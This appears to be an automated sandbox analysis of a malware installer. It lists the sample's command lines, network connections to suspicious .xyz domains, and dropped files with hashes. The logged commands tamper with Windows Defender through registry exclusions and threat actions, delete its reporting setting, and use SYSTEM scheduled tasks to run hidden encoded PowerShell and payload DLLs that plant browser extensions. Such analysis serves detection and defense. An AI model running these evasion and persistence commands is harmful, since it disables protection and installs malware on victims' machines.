C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gpmZRsGjw" /SC once /ST 04:00:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gpmZRsGjw"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gpmZRsGjw"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZJggANjsYpCqsGjEe" /SC once /ST 05:58:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe\" UK /ebsite_idPzz 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ZJggANjsYpCqsGjEe"

C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe

C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe UK /ebsite_idPzz 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bCAdHbOFiqtMCRhbmR"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\gSDcrr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\OWVjaur.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\nDjUBsQ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\jSCPKLl.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\FGLQcKv.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\qgqTozQ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "kkPqOHrufYpxTagPJ" /SC once /ST 08:57:19 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\LYlDDAKO\YmkxHCZ.dll\",#1 /vcsite_idwkl 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "kkPqOHrufYpxTagPJ"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\LYlDDAKO\YmkxHCZ.dll",#1 /vcsite_idwkl 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\LYlDDAKO\YmkxHCZ.dll",#1 /vcsite_idwkl 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "kkPqOHrufYpxTagPJ"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ZJggANjsYpCqsGjEe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 19.40.53.23.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 232.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 3.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 172.217.169.46:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 142.250.187.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 46.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 225.187.250.142.in-addr.arpa udp
GB 172.217.169.46:443 clients2.google.com tcp
US 8.8.8.8:53 api3.check-data.xyz udp
US 44.239.141.158:80 api3.check-data.xyz tcp
US 8.8.8.8:53 158.141.239.44.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe

MD5 ea99e72c1ac89aa9cc14178b1c46d50d
SHA1 60b896781f40e89106d0c76abd11c5b5d0832943
SHA256 9cd503eed313e3c5293f192804c0f20a4eef448876f8375fbc26a25be36d5b28
SHA512 03693bda0c8b693c09e416a7d0c335294f74804f336058a59612a07aa0dd918cd70958cc95feba7d3b26b2df235b0a60d0347d6ed6e353fec8c87c969f6068f1

memory/1360-12-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/3648-16-0x00007FFF15A70000-0x00007FFF16531000-memory.dmp

memory/3648-17-0x000001A1B8810000-0x000001A1B8820000-memory.dmp

memory/3648-18-0x000001A1B8810000-0x000001A1B8820000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t3dadv40.say.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3648-28-0x000001A1BAA00000-0x000001A1BAA22000-memory.dmp

memory/3648-29-0x000001A1B8810000-0x000001A1B8820000-memory.dmp

memory/3648-32-0x00007FFF15A70000-0x00007FFF16531000-memory.dmp

memory/1320-38-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/4852-41-0x0000000072F80000-0x0000000073730000-memory.dmp

memory/4852-42-0x00000000012A0000-0x00000000012B0000-memory.dmp

memory/4852-43-0x00000000012F0000-0x0000000001326000-memory.dmp

memory/4852-44-0x00000000012A0000-0x00000000012B0000-memory.dmp

memory/4852-45-0x0000000003DC0000-0x00000000043E8000-memory.dmp

memory/4852-46-0x0000000003D40000-0x0000000003D62000-memory.dmp

memory/4852-47-0x0000000004460000-0x00000000044C6000-memory.dmp

memory/4852-48-0x00000000045C0000-0x0000000004626000-memory.dmp

memory/4852-58-0x0000000004630000-0x0000000004984000-memory.dmp

memory/4852-59-0x0000000004C00000-0x0000000004C1E000-memory.dmp

memory/4852-60-0x0000000004C50000-0x0000000004C9C000-memory.dmp

memory/4852-61-0x00000000012A0000-0x00000000012B0000-memory.dmp

memory/4852-64-0x0000000072F80000-0x0000000073730000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

memory/4268-66-0x0000000072F80000-0x0000000073730000-memory.dmp

memory/4268-67-0x0000000003F60000-0x0000000003F70000-memory.dmp

memory/4268-68-0x0000000003F60000-0x0000000003F70000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ff60e84ccad303f84da75326763ef722
SHA1 bb9ab96596d0149fcbd37affc3641ea10dc82950
SHA256 0302e0d948e4f1d9c15a19bc282f0d43e9f585366b04d724641c674b770252b9
SHA512 df3c7a349f252a522346e551148eb5c3074166ada7962bc21b9de1fed1441784fa1d3e28569e99a4c9e31d2bcc409b2cdd6fbc50795689ced2b5563eeb913942

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/3980-84-0x00007FFF16030000-0x00007FFF16AF1000-memory.dmp

memory/3980-85-0x000001CEB9150000-0x000001CEB9160000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

memory/3980-96-0x000001CEB9150000-0x000001CEB9160000-memory.dmp

memory/3980-98-0x00007FFF16030000-0x00007FFF16AF1000-memory.dmp

memory/4268-99-0x0000000072F80000-0x0000000073730000-memory.dmp

memory/3152-104-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/3152-115-0x0000000002960000-0x00000000029E5000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 613a79b5cb424483810704a2c6196d1f
SHA1 2d9b56016294c020ad4b5af3b05e8c496a921175
SHA256 9d086104f0dfa810f7f31b5ad7de8ae168cd6bcd62b6caf743354f75b310d596
SHA512 c2c0eed1b98b8801e19504e930df5975cecb2279cb5384328e2e8a02bc509b5d9e5b7dc0ab5b806d00d19c63a1a26b357e4bf5f1abe5b2bc29b5cb7a51292440

memory/3152-157-0x0000000002FB0000-0x0000000003015000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 cf7a2c156bf508be1d9a4031b8b648a9
SHA1 9553695fb442d46f05248a7a7cde76ecadaa64a0
SHA256 c1d635bf7600e9751bd3ba5a9c9cdbb503ccd3b92040c277e41c3c1b28bd6888
SHA512 7fa3b27907ffeb4715652d20a4e674bce36ed3fcc7280290dd6d72c523a144c2f87b62487c2b8d4c3808d7e2d6ddb33d036b3171f7692d22488d3dcb487b742a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\yvWovCiVU\OWVjaur.xml

MD5 fd0a8066ca8f6bb961a9887b8bc1d2a8
SHA1 663b08dedc8c61388ee649ecc66751b2c4d6ddf8
SHA256 cb42d7e512e8f25ad2a286347d8853a1c4f6520f41bcaad318cea68f5fe607ec
SHA512 eacd2f4e59784662d27b66015ae942ad18db8eb41110232154886def198fa3461679a34caa872d7ef378a3c0d75dd0192f72411dcab2f90d4011992ddc2e454f

C:\Program Files (x86)\LCifMpYymZWU2\nDjUBsQ.xml

MD5 831b1f04a2f7de0aacd33e3cf12708a1
SHA1 9a3c3071c5f046daa3cf884840a2a4b3e9237bca
SHA256 1f630b6e50632e9ef68f8b702c3e8b9f93c4877a998335295cfc29ed067c11c7
SHA512 b6d7e57514b4ad52dbb4a3c72c3a078117262a682d1f2cb249b09053a6cf4b643e6c989bf3babfdd2362881f31d6f6c6135e5528d3fdc6e382b318b3a50fc88f

C:\ProgramData\WkkDuRgYrrqHXcVB\jSCPKLl.xml

MD5 a77a52a10860cc19b6fe6c30ea02e870
SHA1 8123d172990d14fae06ff6c0b9b9035f5476e221
SHA256 b95c1ae6bac0711ef35d9e62e952c54218599ba2f04333901614be04e6c5590e
SHA512 ed44279c5ce89f9c688d6fef298e35ddd8d87f83624109844ddc06ec46f5983be81d44fda3f3c9ae56e5a36e6288452bcc3d8e87bc10358bf5d9c8620675862b

C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\FGLQcKv.xml

MD5 e9136582deb40a7ff890c168ae1cb0d4
SHA1 96c970064db11369008e430044535133eddb043e
SHA256 ceef171e7021daee93150f3356b856cd19e560e090e05a6b72150649cafdfe77
SHA512 d2153b13704ab6c7953388cb5a48ab4120670834285f0058a869b487a18de052f270a7c5335ab717cbc558d52c9eaaa09823555c5fadd584636503e18ec01eb3

C:\Program Files (x86)\mVqQIGUXDOgrC\qgqTozQ.xml

